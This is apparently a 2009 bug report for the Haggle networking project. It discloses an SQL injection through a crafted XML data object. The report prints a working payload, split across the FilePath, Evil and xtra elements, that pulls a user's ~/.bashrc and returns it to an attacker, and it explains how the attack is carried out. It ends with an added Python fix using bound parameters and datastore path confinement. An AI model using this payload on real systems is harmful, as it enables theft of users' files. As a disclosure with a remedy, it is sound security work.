The data object below demonstrates an SQL injection vulnerability currently present in the code that would allow an attacker to retrieve any file on disk that the user running haggle can read.
<Haggle create_time="1244305072.492840">
<Attr name="Evil">Evil</Attr>
<Data>
<FilePath>'*/--','/cruel</FilePath>
<FileName>cruel</FileName>
<DataLen>0</DataLen>
</Data>
<Evil><A>'/*</A>
<Haggle>
<Evil>
<A>*/||'</A>
</Evil>
</Haggle >
<xtra>','~/.bashrc','bashrc',0,1244204689393,1244204690602,1205,-1);/*</xtra>
</Evil>
</Haggle>
Note that the data object above has a 0 file size specified, and only tries to get at the user's .bashrc file.
Also note that the xml header, when inserted into the database, will not indicate that the data object is in any way bad, except for some strange indentation and that the file path is outside haggle's folder. This also means that if this data object were to be propagated through the network, it would simply carry with it the targeted file; it would not also cause other users to spread their files by the same name. The data object that would be spread would look like this:
<Haggle create_time="1244305072.492840">
<Attr name="Evil">Evil</Attr>
<Data>
<FileName>cruel</FileName>
<DataLen>0</DataLen>
</Data>
<Evil>
<A></A>
</Evil>
</Haggle>
<xtra>
The attacker would go about it by inserting the data object above into a haggle instance, and simultaneously have an instance of haggle with an interest in the attribute in the data object. That would cause haggle to send the data object back to the attacker, and the file would arrive with it.
This is currently a minor threat, but it is an important issue.
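The fix the issue calls for is twofold: the metadata fields from the XML must reach the database as bound parameters rather than as text spliced into the INSERT statement, and the FilePath must be confined to haggle's own datastore directory (the one tell the report notes for a bad object). The following is an added example, not Haggle's code: the table name, column names and the datastore location are assumptions, and the SQLite table is created in memory so it runs offline. It stores the report's FilePath value as a plain string, rejects a path that escapes the datastore, and audits already-stored rows for the same condition.

```python
"""Parameterized insert and path-confinement audit for a Haggle-style
data object record.  Added example: schema and datastore path are assumed,
not taken from the Haggle project."""
import os
import sqlite3

# Hypothetical datastore root; Haggle's real location is not given here.
DATASTORE = "/srv/haggle-datastore"


def make_db():
    """In-memory table with the three fields the report's XML carries."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE dataobjects ("
        "  id INTEGER PRIMARY KEY,"
        "  filepath TEXT NOT NULL,"
        "  filename TEXT NOT NULL,"
        "  datalen INTEGER NOT NULL)"
    )
    return conn


def confined_path(path, root=DATASTORE):
    """True only if `path` resolves to a location inside `root`.

    Absolute paths, '..' components and home-relative ('~') paths all
    resolve elsewhere and are rejected; a relative name is joined to root."""
    if path.startswith("~"):
        return False
    root = os.path.abspath(root)
    # os.path.join discards root when path is absolute, so '/etc/x' stays '/etc/x'
    full = os.path.abspath(os.path.join(root, os.path.expanduser(path)))
    return os.path.commonpath([root, full]) == root


def insert_dataobject(conn, filepath, filename, datalen):
    """Insert with bound parameters: the values travel separately from the
    SQL text, so quotes or comment sequences inside FilePath are stored as
    data and never parsed as SQL.  Returns the new row id."""
    if not confined_path(filepath):
        raise ValueError("FilePath escapes datastore: %r" % filepath)
    if datalen < 0:
        raise ValueError("negative DataLen")
    cur = conn.execute(
        "INSERT INTO dataobjects (filepath, filename, datalen) VALUES (?, ?, ?)",
        (filepath, filename, datalen),
    )
    conn.commit()
    return cur.lastrowid


def audit_dataobjects(conn, root=DATASTORE):
    """Return (id, filepath) for stored rows whose path lies outside the
    datastore; this is the check a defender runs over an existing database."""
    return [
        (row_id, path)
        for row_id, path in conn.execute("SELECT id, filepath FROM dataobjects")
        if not confined_path(path, root)
    ]


if __name__ == "__main__":
    db = make_db()
    # FilePath value taken from the report's data object, handled as data.
    insert_dataobject(db, "'*/--','/cruel", "cruel", 0)
    # Constructed legacy row simulating one written by the unpatched code.
    db.execute("INSERT INTO dataobjects (filepath, filename, datalen) "
               "VALUES (?, ?, ?)", ("~/.bashrc", "bashrc", 0))
    print(list(db.execute("SELECT filepath, filename, datalen FROM dataobjects")))
    print("rows outside datastore:", audit_dataobjects(db))
```

Bound parameters alone close the injection; the confinement check is what turns the "path outside haggle's folder" observation in the report into something that can be enforced at insert time and searched for after the fact.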
Original issue reported on code.google.com by daniel.a...@it.uu.se on 31 Aug 2009 at 7:05